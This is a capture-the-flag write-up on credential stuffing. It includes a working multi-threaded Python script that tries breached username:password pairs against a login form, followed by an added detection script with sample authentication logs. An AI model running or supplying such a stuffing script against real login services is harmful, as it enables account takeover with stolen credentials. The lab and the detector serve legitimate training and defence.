Description
Credential stuffing is the automated injection of stolen username and password pairs into website login forms, in order to fraudulently gain access to user accounts. Download the credentials dump creds-dump.txt.
Download creds-dump.txt -- it contains username:password pairs from a data breach.
Launch the challenge instance and note the login endpoint.
    wc -l creds-dump.txt
    head creds-dump.txt
Solution
- Step 1: Inspect the credentials dump
  The file contains lines in the format username:password. One of these pairs is valid for the challenge's login service.

      cat creds-dump.txt | head -20
- Step 2: Automate credential stuffing
  Write a multi-threaded script to try each credential pair against the login endpoint until one succeeds.

      python3 << 'EOF'
      import requests
      from concurrent.futures import ThreadPoolExecutor

      # Replace HOST:PORT with the login endpoint of the challenge instance
      URL = "http://HOST:PORT/login"

      # Split on the first ":" only, so passwords containing ":" stay intact
      with open("creds-dump.txt") as f:
          creds = [line.strip().split(":", 1) for line in f if ":" in line]

      def try_cred(pair):
          username, password = pair
          r = requests.post(URL, data={"username": username, "password": password}, timeout=5)
          # A successful login returns the flag or a welcome message
          if "picoCTF" in r.text or "Welcome" in r.text:
              print(f"Valid: {username}:{password}")
              print(r.text)
              return True
          return False

      with ThreadPoolExecutor(max_workers=20) as ex:
          for result in ex.map(try_cred, creds):
              if result:
                  break
      EOF
Flag
picoCTF{cr3d_stuf_succ3ss_...}
One credential pair in the dump is valid for the service -- multi-threaded stuffing finds it quickly.
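
Seen from the login service's side, the run above has a distinctive shape: one source address, many distinct usernames, almost every attempt failing. The detector below is an added example, not part of the original write-up; the log format, the thresholds and the sample lines are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed sliding window per source IP
MIN_DISTINCT_USERS = 5          # assumed threshold: distinct usernames in the window
MAX_SUCCESS_RATIO = 0.2         # stuffing runs fail on almost every attempt

# Constructed sample auth log: "<ISO time> <source ip> <username> <OK|FAIL>"
SAMPLE_LOG = """\
2024-01-01T10:00:00 203.0.113.7 alice FAIL
2024-01-01T10:00:01 203.0.113.7 bob FAIL
2024-01-01T10:00:01 198.51.100.4 grace FAIL
2024-01-01T10:00:02 203.0.113.7 carol FAIL
2024-01-01T10:00:03 203.0.113.7 dave FAIL
2024-01-01T10:00:04 203.0.113.7 erin FAIL
2024-01-01T10:00:05 203.0.113.7 frank OK
2024-01-01T10:00:09 198.51.100.4 grace FAIL
2024-01-01T10:00:20 198.51.100.4 grace OK
2024-01-01T10:00:30 192.0.2.10 heidi OK
"""

def parse(line):
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result == "OK"

def detect_stuffing(lines):
    """Return {ip: {...}} for sources that look like credential stuffing."""
    windows = defaultdict(deque)  # ip -> recent (time, user, success) events
    alerts = {}
    for ts, ip, user, ok in sorted(parse(l) for l in lines if l.strip()):
        win = windows[ip]
        win.append((ts, user, ok))
        while ts - win[0][0] > WINDOW:  # drop events older than the window
            win.popleft()
        users = {u for _, u, _ in win}
        hits = sorted(u for _, u, s in win if s)
        # Many different accounts from one source, nearly all failing
        if len(users) >= MIN_DISTINCT_USERS and len(hits) / len(win) <= MAX_SUCCESS_RATIO:
            alerts[ip] = {"users": len(users), "attempts": len(win),
                          "compromised": hits}  # accounts needing a forced reset
    return alerts

if __name__ == "__main__":
    for ip, info in detect_stuffing(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

A user who mistypes their own password a few times (198.51.100.4 in the sample) never trips the rule, because the distinct-username count stays at one.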